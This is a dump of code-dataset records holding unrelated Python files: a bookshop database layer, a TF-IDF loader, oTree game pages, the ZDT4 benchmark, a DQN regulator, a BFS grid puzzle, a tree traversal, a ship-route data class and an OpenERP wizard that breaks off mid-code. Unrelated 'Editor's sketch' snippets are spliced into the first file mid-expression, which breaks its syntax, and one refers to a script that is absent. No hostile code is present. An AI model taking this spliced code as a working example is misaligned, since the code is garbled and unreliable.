Table(\r\n 'shop', meta,\r\n\r\n Column('id', 
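# [Editor's sketch] The hand-rolled STFT loop in stft_temp.py above, checked
# against scipy.signal.stft on a synthetic tone; window length and hop follow
# the script (wL=512, R=wL/4, so the overlap is wL-R samples).
import numpy as np
from scipy import signal

fs = 16000
x = np.sin(2 * np.pi * 440 * np.arange(fs) / fs)  # 1 s test tone at 440 Hz
wL = 512
R = int(round(0.25 * wL))
f, t, Zxx = signal.stft(x, fs, window="hann", nperseg=wL, noverlap=wL - R)
print(Zxx.shape)  # (wL//2 + 1 frequency bins, number of frames)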
Integer, primary_key=True),\r\n Column('name', String(20), nullable=False),\r\n Column('address', String(100), nullable=False),\r\n Column('post_code', Integer, nullable=False)\r\n)\r\n\r\nshop_inventory = Table(\r\n 'shop_inventory', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('shop_id', Integer, ForeignKey('shop.id')),\r\n Column('book_id', Integer, ForeignKey('book.id')),\r\n Column('book_quantity', Integer, server_default='0', nullable=False)\r\n)\r\n\r\norder = Table(\r\n 'order', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('reg_date', Date, nullable=False,\r\n server_default=date.datetime.today().strftime(\"%Y-%m-%d\")),\r\n Column('user_id', Integer, ForeignKey('user.id'))\r\n)\r\n\r\norder_position = Table(\r\n 'order_position', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('order_id', Integer, ForeignKey('order.id')),\r\n Column('book_id', Integer, ForeignKey('book.id')),\r\n Column('book_quantity', Integer, server_default='0', nullable=False),\r\n Column('shop_id', Integer, ForeignKey('shop.id'))\r\n)\r\n\r\n\r\n# Создание экзепляра 'двигателя (engine)' для возмжности отправки запросов в БД\r\nasync def init_pg(app):\r\n # Загрузка конфигурации БД\r\n conf = app['config']['postgres']\r\n # Создание экземпляра 'двигателя'\r\n engine = await aiopg.sa.create_engine(\r\n database=conf['database'],\r\n user=conf['user'],\r\n password=conf['password'],\r\n host=conf['host'],\r\n port=conf['port'],\r\n minsize=conf['minsize'],\r\n maxsize=conf['maxsize'],\r\n )\r\n # Присвоение экзепляра двигателя нашему приложению\r\n app['db'] = engine\r\n\r\n\r\n# Отключение экземпляра двигателя\r\nasync def close_pg(app):\r\n app['db'].close()\r\n await app['db'].wait_closed()\r\n\r\n\r\n# Определения новго класса ошибок разного рода при выполнении запросов в БД:\r\nclass RecordNotFound(Exception):\r\n \"\"\"Requested record in database was not found\"\"\"\r\n\r\n\r\n# Функция отправки запроса для получения данных пользователя\r\nasync def get_user(conn, uii=None, ei=None):\r\n # Определение параметра с помощью которого будет выполнен запрос\r\n # Является ли это id пользователя или email\r\n temp = None\r\n if uii:\r\n temp = uii\r\n col = user.c.id\r\n elif ei:\r\n temp = ei\r\n col = user.c.email\r\n # Сам запрос\r\n query = await conn.execute(\r\n user.select()\r\n .where(col == temp))\r\n result = await query.fetchall()\r\n # Проверка наличия данных в ответе на запроса\r\n if not result:\r\n msg = \"User with id/email: {} does not exists\"\r\n raise RecordNotFound(msg.format(temp))\r\n record = [dict(q) for q in result]\r\n return record\r\n\r\n\r\n# Функия получения истории запросов пользователя\r\nasync def get_order_list(conn, id_pointer=None, email_pointer=None):\r\n # Определение параметра (id/email) с помощью которого будет выполнен запрос\r\n temp = None\r\n if id_pointer:\r\n temp = id_pointer\r\n col = user.c.id\r\n elif email_pointer:\r\n temp = email_pointer\r\n col = user.c.email\r\n # Объединение таблиц\r\n j1 = user.join(order, user.c.id == order.c.user_id)\r\n j2 = j1.join(order_position, j1.c.order_id == order_position.c.order_id)\r\n j3 = j2.join(book, j2.c.order_position_book_id == book.c.id)\r\n # Выполнение запроса\r\n query = await conn.execute(select([user.c.id,\r\n user.c.name,\r\n order.c.reg_date,\r\n book.c.id,\r\n book.c.name,\r\n order_position.c.book_quantity,\r\n book.c.price\r\n ],\r\n use_labels=True\r\n )\r\n .select_from(j3)\r\n .where(col == temp))\r\n result = await query.fetchall()\r\n # 
Проверка наличия данных в ответе на запрос\r\n if not result:\r\n msg = \"User with id/email: {} doesn't exists or doesn't have any order\"\r\n raise RecordNotFound(msg.format(temp))\r\n record = [dict(q) for q in result]\r\n return record\r\n\r\n\r\n# Функция для определения инвентаря магазина\r\nasync def get_stock_list(conn, id_pointer=None, name_pointer=None):\r\n # Определение параметра (id/name) с помощью которого будет выполнен запрос\r\n temp = None\r\n if id_pointer:\r\n temp = id_pointer\r\n col = shop.c.id\r\n elif name_pointer:\r\n temp = name_pointer\r\n col = shop.c.name\r\n # Объединение таблиц\r\n j1 = shop_inventory.join(book, shop_inventory.c.book_id == book.c.id)\r\n j2 = j1.join(shop, j1.c.shop_inventory_shop_id == shop.c.id)\r\n # Выполнение запроса о состоянии инвентаря в БД\r\n query = await conn.execute(select([shop_inventory.c.book_id,\r\n book.c.name,\r\n shop_inventory.c.book_quantity\r\n ]\r\n )\r\n .select_from(j2)\r\n .where(col == temp)\r\n )\r\n\r\n # Чтобы скрыть отсутствующие книги:\r\n # .where(and_(col == temp,shop_inventory.c.book_quantity != 0))\r\n\r\n result = await query.fetchall()\r\n\r\n # Проверка наличия данных в ответе на запрос\r\n if not result:\r\n msg = \"Shop with id/name: {} does not exists\"\r\n raise RecordNotFound(msg.format(temp))\r\n\r\n record = [dict(q) for q in result]\r\n\r\n # Запрос в БД для получения информации о магазине (id, name, address)\r\n query2 = await conn.execute(shop.select().where(col == temp))\r\n result2 = await query2.fetchall()\r\n record2 = [dict(q) for q in result2]\r\n return record2, record\r\n\r\n\r\n# Функция добавления нового заказа в БД\r\nasync def add_order(\r\n conn, user_pointer, book_pointer,\r\n book_number, shop_pointer\r\n):\r\n # Проверка наличия user-id в БД\r\n check_user = await conn.execute(user.select()\r\n .where(user.c.id == user_pointer))\r\n check_user_res = await check_user.fetchall()\r\n if not check_user_res:\r\n msg = '''User with id:{} doesn't exists.\r\n To add an order, first create a user.'''\r\n raise RecordNotFound(msg.format(user_pointer))\r\n\r\n # Проверка наличия book-id в БД\r\n check_book = await conn.execute(book.select()\r\n .where(book.c.id == book_pointer))\r\n check_book_res = await check_book.fetchall()\r\n if not check_book_res:\r\n msg = '''Book with id: {} does not exists.\r\n To add an order, first create a book.'''\r\n raise RecordNotFound(msg.format(book_pointer))\r\n\r\n # Проверка наличия shop-id в БД\r\n check_shop = await conn.execute(shop.select()\r\n .where(shop.c.id == shop_pointer))\r\n check_shop_res = await check_shop.fetchall()\r\n if not check_shop_res:\r\n msg = '''Shop with id: {} does not exists.\r\n To add an order, first create a shop.'''\r\n raise RecordNotFound(msg.format(shop_pointer))\r\n\r\n # Определение количества книги в наличии\r\n shop_inventory\r\n query_book_have = await conn.execute(\r\n select([shop_inventory.c.book_quantity])\r\n .select_from(shop_inventory)\r\n .where(and_(shop_inventory.c.shop_id == shop_pointer,\r\n shop_inventory.c.book_id == book_pointer))\r\n )\r\n book_have = await query_book_have.fetchone()\r\n\r\n # Сравнение требуемого количества книг с наличием\r\n if book_number > book_have[0]:\r\n msg = '''The store (id: {}) does not have the required number of the book.\r\n Number of the book available: {}'''\r\n raise RecordNotFound(msg.format(shop_pointer, book_have[0]))\r\n\r\n # Добавление новой записи в таблицу Order\r\n await conn.execute(order.insert()\r\n .values(user_id=user_pointer))\r\n\r\n # Получение 
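# [Editor's sketch] The Core-style join/select shape used by get_order_list()
# above, exercised synchronously against in-memory SQLite so the query can be
# smoke-tested without PostgreSQL/aiopg; `meta`, `user`, `order` and `select`
# are the objects already defined/imported at the top of this module.
from sqlalchemy import create_engine

def smoke_test_join():
    engine = create_engine("sqlite://")
    meta.create_all(engine)
    with engine.connect() as conn:
        j = user.join(order, user.c.id == order.c.user_id)
        query = select([user.c.name, order.c.reg_date]).select_from(j)
        return conn.execute(query).fetchall()  # empty: nothing inserted yet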
id из таб. Order, для последующей вставки в таб. Order_position\r\n query_order_id = await conn.execute(select([order.c.id])\r\n .order_by(order.c.id.desc()))\r\n record_order_id = await query_order_id.fetchone()\r\n\r\n # Добавление новой записи в таблицу Order_position\r\n await conn.execute(order_position.insert()\r\n .values(order_id=record_order_id[0],\r\n book_id=book_pointer,\r\n book_quantity=book_number,\r\n shop_id=shop_pointer))\r\n\r\n # Обновление количества книг в наличии в таблице shop_inventory\r\n books_left = book_have[0] - book_number\r\n await conn.execute(\r\n shop_inventory.update()\r\n .where(and_(shop_inventory.c.shop_id == shop_pointer,\r\n shop_inventory.c.book_id == book_pointer))\r\n .values(book_quantity=books_left)\r\n )\r\n return books_left\r\n","sub_path":"Book shop/main/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":11126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"341745044","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport time\n\ndef load_data():\n print(\"正在加载数据....\")\n train = pd.read_csv(r'../Data/new_data/part_train_set.csv')\n test = pd.read_csv(r'../Data/new_data/part_test_set.csv')\n\n print(' 加载完毕')\n test_id = test[['id']].copy()\n column = \"word_seg\"\n # ngram_range:词组切分的长度范围\n # max_df:可以设置为范围在[0.0 1.0]的float,也可以设置为没有范围限制的int,默认为1.0。\n # 这个参数的作用是作为一个阈值,当构造语料库的关键词集的时候,如果某个词的document frequence大于max_df,这个词不会被当作关键词。\n # 如果这个参数是float,则表示词出现的次数与语料库文档数的百分比,如果是int,则表示词出现的次数。如果参数中已经给定了vocabulary,则这个参数无效\n # min_df:类似于max_df,不同之处在于如果某个词的document frequence小于min_df,则这个词不会被当作关键词\n # use_idf:默认为True,权值是tf*idf,如果设为False,将不使用idf,就是只使用tf,相当于CountVectorizer了\n # smooth_idf:idf平滑参数,默认为True,idf=ln((文档总数+1)/(包含该词的文档数+1))+1,如果设为False,idf=ln(文档总数/包含该词的文档数)+1\n # sublinear_tf:默认为False,如果设为True,则替换tf为1 + log(tf)。\n vec = TfidfVectorizer(min_df=3, max_df=0.9)\n # vec = TfidfVectorizer()\n train_term_doc = vec.fit_transform(train[column])\n test_term_doc = vec.transform(test[column])\n y = (train['class']).astype(int)\n data=dict()\n data['id'] = test_id['id']\n data['train'] = train_term_doc\n data['test'] = test_term_doc\n data['y'] = y\n del test_id['id'],train_term_doc,test_term_doc\n return data\n\nif __name__ == '__main__':\n train_Data = load_data()\n print('y:', train_Data['train'][0],train_Data['train'][1999].shape )\n\n\n","sub_path":"00_preprocess/TF_IDF.py","file_name":"TF_IDF.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"454006666","text":"from ._builtin import Page, WaitPage\n\n\nclass Introduction(Page):\n\n def is_displayed(self):\n return self.player.round_number == 1\n\n\nclass Main(Page):\n form_model = 'player'\n form_fields = ['choice']\n\n\nclass ResultsWaitPage(WaitPage):\n\n def after_all_players_arrive(self):\n for p in self.group.get_players():\n p.set_payoff()\n\n\nclass Results(Page):\n\n def vars_for_template(self):\n return {\n 'player_payoff': int(self.player.payoff),\n 'opponent_choice': self.player.other_player().choice,\n }\n\n\nclass Final(Page):\n\n def is_displayed(self):\n return self.round_number == 5\n\n def vars_for_template(self):\n opponent = self.player.other_player()\n my_total = int(self.participant.payoff)\n opponent_total = int(opponent.participant.payoff)\n return {\n 'my_payoff': my_total,\n 'opponent_payoff': opponent_total\n }\n\n\npage_sequence = [\n Introduction,\n Main,\n 
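# [Editor's sketch] The min_df/max_df thresholds from load_data() above on a
# toy corpus: min_df=2 drops terms seen in fewer than two documents, and
# max_df=0.9 would drop terms appearing in more than 90% of them.
from sklearn.feature_extraction.text import TfidfVectorizer

docs = ["cat sat mat", "cat sat hat", "dog sat log", "dog ran far"]
vec = TfidfVectorizer(min_df=2, max_df=0.9)
X = vec.fit_transform(docs)
print(sorted(vec.vocabulary_))  # ['cat', 'dog', 'sat'] -- the rest are too rare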
ResultsWaitPage,\n Results,\n Final\n]\n","sub_path":"games/frontrunner/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"2551833","text":"from Model import Model\nimport math\n\n__author__ = 'kapilsomani'\n\n\nclass ZDT4(Model):\n def __init__(self, num_decisions=10, num_objectives=2):\n Model.__init__(self)\n self.num_decisions = 10 # Hard Coding\n self.num_objectives = 2 # Hard Coding\n self.min_decision_val = [0, -5, -5, -5, -5, -5, -5, -5, -5, -5]\n self.max_decision_val = [1, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n self.decisions = [0] * num_decisions\n self.objectives = []\n self.name = \"ZDT4\"\n self.optimum = {'min': 30.66, 'max': 306.42} # energy values approximated after multiple(x100000's) runs\n\n def constraints(self):\n\n def g1(can):\n return True\n\n return [g1]\n\n def objective_calc(self):\n\n def f(can):\n n = len(can)\n summ = sum([(x**2 - 10*math.cos(4*math.pi*x)) for x in can[1:]])\n g = 1 + 10*(n-1) + summ\n objectives_list = [None] * 2\n objectives_list[0] = can[0]\n objectives_list[1] = g * (1 - (can[0]/g)**2)\n self.objectives = objectives_list\n return objectives_list\n\n return f\n","sub_path":"hw/code/10/models/ZDT4.py","file_name":"ZDT4.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"147135836","text":"# @Author: dileep\n# @Last Modified by: dileep\n\nfrom typing import List, Dict, Tuple\nimport torch\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom .memory import Action, Event\nfrom .regulator import Regulator\nfrom .dqn.dddqn import Network\n\nStateType = Tuple[Dict[str, float], Dict[str, float]]\n\n\nclass DQNRegulator(Regulator):\n \"\"\"\n DQN regulator class\n\n Parameters\n ---------\n dfba_obj : DFBA\n DFBA instance\n\n Attributes\n ---------\n observation_size : int\n Dimensions of the observation space\n action_size : int\n Dimensions of the action space\n state_space : Dict[str, int]\n action_space : Dict[int, Tuple[str, str]]\n \"\"\"\n name = \"DQN\"\n _frac = 0.1\n _gamma = 0.99\n _update_delay = 100\n _temp = 1 # affects the certainity of actions\n _temp_increase = 0.001\n # _epsilon = 1.0\n # _epsilon_decay = 0.999\n\n def __init__(self, ex_reactions: List[str], ex_metabolites: List[str]) -> None:\n super().__init__(ex_reactions, ex_metabolites)\n self.eval_net = Network(self.state_size, self.action_size) # .cuda()\n self.target_net = Network(self.state_size, self.action_size) # .cuda()\n self.target_net.load_state_dict(self.eval_net.state_dict()) # hard reset\n self.optimizer = torch.optim.Adam(self.eval_net.parameters())\n self.criterion = F.smooth_l1_loss\n self.time_since_target_train = 0\n\n def select_action(self, concentrations: Dict[str, float], fluxes: Dict[str, float]) -> Action:\n \"\"\"\n Select action based on concentrations and fluxes\n Action selection is based on multinomial probability distribution\n\n Parameters\n ---------\n concentrations : Dict[str, float]\n Concentrations of the components of the media\n fluxes : Dict[str, float]\n Exchange fluxes of the reaction in the microbe\n \"\"\"\n state = self._encode_state(concentrations, fluxes)\n state = torch.from_numpy(state).float()\n if torch.cuda.is_available():\n state = state.cuda()\n x = Variable(state.unsqueeze_(0), volatile=True)\n probs = F.softmax(self.eval_net(x) * self._temp)\n action = probs.multinomial()\n 
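# [Editor's sketch] A quick numeric check of the ZDT4 objectives as defined
# above: with all trailing decisions at 0, the summation cancels the 10*(n-1)
# term, g collapses to 1, and the point lies on the model's optimal front.
import math

def zdt4(can):
    n = len(can)
    summ = sum(x ** 2 - 10 * math.cos(4 * math.pi * x) for x in can[1:])
    g = 1 + 10 * (n - 1) + summ
    return [can[0], g * (1 - (can[0] / g) ** 2)]

print(zdt4([0.5] + [0.0] * 9))  # [0.5, 0.75] since g == 1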
decoded_action = self._decode_action(action.data[0, 0])\n return decoded_action\n\n def train(self):\n \"\"\"\n Network Training\n \"\"\"\n mini_batch = self.memory.sample(self._batch_size)\n mini_batch = Event(*zip(*mini_batch))\n # calculate the estimated value\n mini_batch_state = torch.Tensor(mini_batch.state)\n mini_batch_action = torch.LongTensor(mini_batch.action).unsqueeze(1)\n if torch.cuda.is_available():\n mini_batch_state = mini_batch_state.cuda()\n mini_batch_action = mini_batch_action.cuda()\n estimated_value = self.eval_net(Variable(mini_batch_state))\n estimated_value = estimated_value.gather(1, Variable(mini_batch_action))\n # calculate the actual value\n mini_batch_next_state = torch.Tensor(mini_batch.next_state)\n mini_batch_reward = torch.Tensor(mini_batch.reward).unsqueeze(1)\n if torch.cuda.is_available():\n mini_batch_next_state = mini_batch_next_state.cuda()\n mini_batch_reward = mini_batch_reward.cuda()\n target_value = self.target_net(Variable(mini_batch_next_state))\n target_value = target_value.detach().max(1)[0].unsqueeze(1)\n targetted_value = self._gamma * target_value + Variable(mini_batch_reward)\n # compute loss\n self.optimizer.zero_grad()\n loss = self.criterion(estimated_value, targetted_value)\n loss.backward()\n self.optimizer.step()\n self.time_since_target_train += 1\n # train target\n if self.time_since_target_train == self._update_delay:\n self.time_since_target_train = 0\n self.target_net.load_state_dict(self.eval_net.state_dict())\n self._temp += self._temp_increase\n\n def update(self, state_raw: StateType, action_raw: Action, next_state_raw: StateType,\n reward: float) -> None:\n \"\"\"\n Update the network with new events.\n If the network has accumulated enough events this function will also train it\n\n Parameters\n ---------\n state_raw : StateType\n The current raw state in the simulation\n action_raw : Action\n The action taken by the network in the simulation\n next_state_raw : StateType\n The next state in the simulation after taking the action\n reward : float\n The reward for the state transition\n \"\"\"\n state = self._encode_state(*state_raw)\n next_state = self._encode_state(*next_state_raw)\n action = self._encode_action(action_raw)\n self.memory.add_event(Event(state, action, next_state, reward))\n # training\n if len(self.memory) >= self._batch_size:\n self.train()\n\n def save(self) -> dict:\n \"\"\"\n Return model state parameters for saving\n \"\"\"\n parameters = {\n 'eval_net': self.eval_net.state_dict(),\n 'target_net': self.target_net.state_dict(),\n 'optimizer': self.optimizer.state_dict()\n }\n return parameters\n\n def load(self, parameters: dict) -> None:\n \"\"\"\n Load model state parameters from disk\n \"\"\"\n self.eval_net.load_state_dict(parameters['eval_net'])\n self.target_net.load_state_dict(parameters['target_net'])\n self.optimizer.load_state_dict(parameters['optimizer'])\n return None\n","sub_path":"microbial_ai/regulation/dqnregulator.py","file_name":"dqnregulator.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"11040905","text":"# deque로 BFS 구현\nfrom collections import deque\n\nm, n = map(int, input().split())\n# 2차원 리스트로 토마토 넣기\nbox = [list(map(int, input().split())) for _ in range(n)]\n# 좌표를 사용해 관리 할 것이므로 []로 초기화\nqueue = deque([])\ndx, dy = [-1, 1, 0, 0], [0, 0, -1, 1]\nres = 0\n\n# queue에 처음 받은 토마토의 위치 좌표 append\nfor i in range(n):\n for j in range(m):\n if box[i][j] == 1:\n queue.append([i, 
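# [Editor's sketch] The temperature-scaled action sampling from select_action()
# above, reduced to NumPy: multiplying the Q-values by a growing _temp sharpens
# the softmax, so action choice becomes more deterministic over training.
import numpy as np

rng = np.random.default_rng(0)
q_values = np.array([1.0, 2.0, 0.5])
for temp in (1.0, 10.0):
    logits = q_values * temp
    probs = np.exp(logits - logits.max())
    probs /= probs.sum()
    print(temp, probs.round(3), rng.choice(len(q_values), p=probs))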
j])\n\ndef bfs():\n while queue:\n x, y = queue.popleft()\n for i in range(4):\n nx, ny = dx[i] + x, dy[i] + y\n if 0 <= nx < n and 0 <= ny < m and box[nx][ny] == 0:\n box[nx][ny] = box[x][y] + 1\n queue.append([nx, ny])\n\nbfs()\n\nfor i in box:\n for j in i:\n if j == 0:\n print(-1) # 다 익지 못하는 경우\n exit(0)\n\t\t# 다 익힌 경우 최대 값 지정\n res = max(res, max(i))\n\nprint(res - 1)","sub_path":"03. DFS&BFS/7576/7576.py","file_name":"7576.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"207097367","text":"# https://oj.leetcode.com/problems/binary-tree-level-order-traversal-ii/\n\n# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a list of lists of integers\n def levelOrderBottom(self, root):\n if root == None:\n return []\n\n q = [root]\n ans = []\n\n # visit by level\n while len(q) > 0:\n next_level = []\n num = []\n\n while len(q) > 0:\n cur = q.pop(0)\n num.append(cur.val)\n if cur.left != None:\n next_level.append(cur.left)\n if cur.right != None:\n next_level.append(cur.right)\n\n ans.insert(0, num)\n q = next_level\n\n return ans\n","sub_path":"leetans/levelOrderII.py","file_name":"levelOrderII.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"159751609","text":"import numpy as np\nimport datetime as dt\nfrom typing import NamedTuple\nimport json\nimport dateutil.parser\n\nimport utils\nimport matplotlib.pyplot as plt\nimport graphics\nfrom utils import NumpyArrayEncoder\n\n\nclass RouteParams():\n \"\"\"\n Isochrone data structure with typing.\n Parameters:\n count: int (routing step)\n start: tuple (lat,long at start)\n finish: tuple (lat,lon and end)\n gcr_azi: float (initial gcr heading)\n lats1, lons1, azi1, s12: (M, N) arrays, N=headings+1, M=number of steps+1 (decreasing step number)\n azi0, s0: (M, 1) vectors without history\n time1: current datetime\n elapsed: complete elapsed timedelta\n \"\"\"\n count: int # routing step\n start: tuple # lat, lon at start\n finish: tuple # lat, lon at end\n fuel: float\n full_dist_traveled: tuple\n gcr: tuple\n rpm: int # propeller [revolutions per minute]\n route_type: str # route name\n time: dt.timedelta # time needed for the route [datetime]\n fuel_per_step: tuple # sum of power consumption [W]\n lats_per_step: tuple # lats: (M,N) array, N=headings+1, M=steps (M decreasing)\n lons_per_step: tuple # longs: (M,N) array, N=headings+1, M=steps\n azimuths_per_step: tuple # azimuth: (M,N) array, N=headings+1, M=steps [degree]\n dists_per_step: tuple # geodesic distance traveled per time stamp: (M,N) array, N=headings+1, M=steps [m]\n speed_per_step: tuple # boat speed per step [m/s]\n starttime_per_step: tuple\n full_dist_traveled: tuple # full geodesic distance since start [m]\n\n def __init__(self, count, start, finish, fuel, full_dist_traveled,gcr, rpm, route_type, time, lats_per_step, lons_per_step, azimuths_per_step, dists_per_step, speed_per_step, starttime_per_step, fuel_per_step):\n self.count = count # routing step\n self.start = start # lat, lon at start\n self.finish = finish # lat, lon at end\n self.fuel = fuel # sum of fuel consumption [kWh]\n self.full_dist_traveled = full_dist_traveled #full travel distance [m]\n self.gcr = gcr\n self.rpm = rpm # propeller [revolutions per minute]\n 
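# [Editor's sketch] The level-order solution above dequeues with list.pop(0),
# which is O(n) per pop; a collections.deque keeps each dequeue O(1) while
# producing the same bottom-up traversal (nodes only need val/left/right).
from collections import deque

def level_order_bottom(root):
    if root is None:
        return []
    ans, q = [], deque([root])
    while q:
        level = []
        for _ in range(len(q)):
            node = q.popleft()
            level.append(node.val)
            if node.left:
                q.append(node.left)
            if node.right:
                q.append(node.right)
        ans.insert(0, level)
    return ans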
self.route_type = route_type # route name\n self.time = time # time needed for the route [h]\n self.lats_per_step = lats_per_step\n self.lons_per_step = lons_per_step\n self.azimuths_per_step = azimuths_per_step # [degrees]\n self.dists_per_step = dists_per_step #travel distance per step [m]\n self.speed_per_step = speed_per_step #speed per step [m/s]\n self.starttime_per_step =starttime_per_step\t# time at start of every step\n self.fuel_per_step = fuel_per_step \t#fuel consumption per step [kWh]\n\n def print_route(self):\n utils.print_line()\n print('Printing route: ' + str(self.route_type))\n print('Going from', self.start)\n print('to')\n print(self.finish)\n print('routing steps ' + str(self.count))\n print('time ' + str(self.time))\n print('fuel ' + str(self.fuel))\n print('full_dist_traveled ' + str(self.full_dist_traveled))\n print('gcr ' + str(self.gcr))\n print('rpm ' + str(self.rpm))\n print('lats_per_step ' + str(self.lats_per_step))\n print('lons_per_step ' + str(self.lons_per_step))\n print('azimuths_per_step ' + str(self.azimuths_per_step))\n print('dists_per_step ' + str(self.dists_per_step))\n print('speed_per_step ' + str(self.speed_per_step))\n print('start_time_per_step' + str(self.starttime_per_step))\n print('fuel_per_step' + str(self.fuel_per_step))\n utils.print_line()\n\n def __eq__(self, route2):\n bool_equal=True\n if not (self.count == route2.count):\n raise ValueError('Route counts not matching')\n if not (np.array_equal(self.start, route2.start)):\n raise ValueError('Route start not matching')\n if not (np.array_equal(self.finish, route2.finish)):\n raise ValueError('Route finsh not matching')\n if not (np.array_equal(self.time, route2.time)):\n raise ValueError('Route time not matching: self=' + str(self.time) + ' other=' + str(route2.time))\n if not (np.array_equal(self.fuel, route2.fuel)):\n raise ValueError('Route fuel not matching: self=' + str(self.fuel) + ' other=' + str(route2.fuel))\n if not (np.array_equal(self.rpm, route2.rpm)):\n raise ValueError('Route rpm not matching')\n if not (np.array_equal(self.lats_per_step, route2.lats_per_step)):\n raise ValueError('Route lats_per_step not matching')\n if not (np.array_equal(self.lons_per_step, route2.lons_per_step)):\n raise ValueError('Route lons_per_step not matching')\n if not (np.array_equal(self.azimuths_per_step, route2.azimuths_per_step)):\n raise ValueError('Route azimuths_per_step not matching')\n if not (np.array_equal(self.dists_per_step, route2.dists_per_step)):\n raise ValueError('Route dists_per_step not matching')\n if not (np.array_equal(self.full_dist_traveled, route2.full_dist_traveled)):\n raise ValueError('Route full_dist_traveled not matching')\n\n return bool_equal\n\n def convert_to_dict(self):\n rp_dict = {\n \"count\" : self.count,\n \"start\" : self.start,\n \"finish\": self.finish,\n \"fuel\": self.fuel,\n \"full_dist_traveled\": self.full_dist_traveled,\n \"gcr\": self.gcr,\n \"rpm\" : self.rpm,\n \"route type\" : self.route_type,\n \"time\" : self.time,\n \"fuel_per_step\" : self.fuel_per_step,\n \"lats_per_step\" : self.lats_per_step,\n \"lons_per_step\" : self.lons_per_step,\n \"azimuths_per_step\" : self.azimuths_per_step,\n \"dists_per_step\" : self.dists_per_step,\n \"speed_per_step\" : self.speed_per_step,\n \"starttime_per_step\" : self.starttime_per_step,\n }\n return rp_dict\n\n def write_to_file(self, filename):\n rp_dict = self.convert_to_dict()\n with open(filename, 'w') as file:\n json.dump(rp_dict, file, cls=NumpyArrayEncoder, indent=4)\n\n @classmethod\n def 
from_file(cls, filename):\n with open(filename) as file:\n rp_dict = json.load(file)\n\n count = rp_dict['count']\n start = rp_dict['start']\n finish = rp_dict['finish']\n fuel = rp_dict['fuel']\n full_dist_traveled = rp_dict['full_dist_traveled']\n gcr = rp_dict['gcr']\n rpm = rp_dict['rpm']\n route_type = rp_dict['route type']\n time = rp_dict['time']\n lats_per_step = np.asarray(rp_dict['lats_per_step'])\n lons_per_step = np.asarray(rp_dict['lons_per_step'])\n azimuths_per_step = np.asarray(rp_dict['azimuths_per_step'])\n dists_per_step = np.asarray(rp_dict['dists_per_step'])\n speed_per_step = np.asarray(rp_dict['speed_per_step'])\n starttime_per_step = np.asarray(rp_dict['starttime_per_step'])\n fuel_per_step = np.asarray(rp_dict['fuel_per_step'])\n\n return cls(\n count = count,\n start = start,\n finish = finish,\n fuel = fuel,\n full_dist_traveled = full_dist_traveled,\n gcr = gcr,\n rpm = rpm,\n route_type = route_type,\n time = time,\n lats_per_step = lats_per_step,\n lons_per_step = lons_per_step,\n azimuths_per_step = azimuths_per_step,\n dists_per_step = dists_per_step,\n speed_per_step = speed_per_step,\n starttime_per_step = starttime_per_step,\n fuel_per_step = fuel_per_step\n )\n def plot_route(self, ax, colour, label):\n lats = self.lats_per_step\n lons = self.lons_per_step\n ax.plot(lons, lats, color = colour, label = label, linewidth=2)\n\n ax.plot(self.start[1], self.start[0], marker=\"o\", markerfacecolor=colour, markeredgecolor=colour,\n markersize=10)\n ax.plot(self.finish[1], self.finish[0], marker=\"o\", markerfacecolor=colour, markeredgecolor=colour,\n markersize=10)\n return ax\n\n def plot_power_vs_dist(self, color, label):\n power = self.fuel_per_step\n dist = self.dists_per_step\n lat = self.lats_per_step\n lon = self.lons_per_step\n\n dist = dist/1000 # [m] -> [km]\n hist_values = graphics.get_hist_values_from_widths(dist, power)\n\n plt.bar(hist_values[\"bin_centres\"], hist_values[\"bin_content\"], dist, fill=False, color = color, edgecolor = color, label = label)\n plt.xlabel('Weglänge (km)')\n plt.ylabel('Energie (kWh/km)')\n plt.xticks()\n","sub_path":"Isochrone/routeparams.py","file_name":"routeparams.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185448469","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nimport openerp.addons.decimal_precision as dp\n\nclass account_payment_order_wizard(osv.osv_memory):\n _name =\"account.payment.order.wizard\"\n _inherit ='payment.document'\n _columns = {\n\n }\n \n def fields_view_get(self, cr, uid, view_id=None, view_type='form',\n context=None, toolbar=False, submenu=False):\n \"\"\"\n Changes the view dynamically\n @param self: The object pointer.\n @param cr: A database cursor\n @param uid: ID of the user currently logged in\n @param context: A standard dictionary\n @return: New arch of view.\n \"\"\"\n if context is None:\n context={}\n if 'active_ids' in context and len(context.get('active_ids')) > 1:\n self.pool.get('account.voucher').validate_transaction(cr, uid, context.get('active_ids'), context)\n \n res = super(account_payment_order_wizard, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)\n return res\n\n \n def default_get(self, cr, uid, fields, context=None):\n if context is None:\n context = {}\n res = super(account_payment_order_wizard, self).default_get(cr, uid, fields, 
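# [Editor's sketch] write_to_file() above relies on utils.NumpyArrayEncoder; a
# common implementation is assumed here (not taken from the repo): convert
# ndarrays and NumPy scalars so json.dump can serialize the route dict.
import json
import numpy as np

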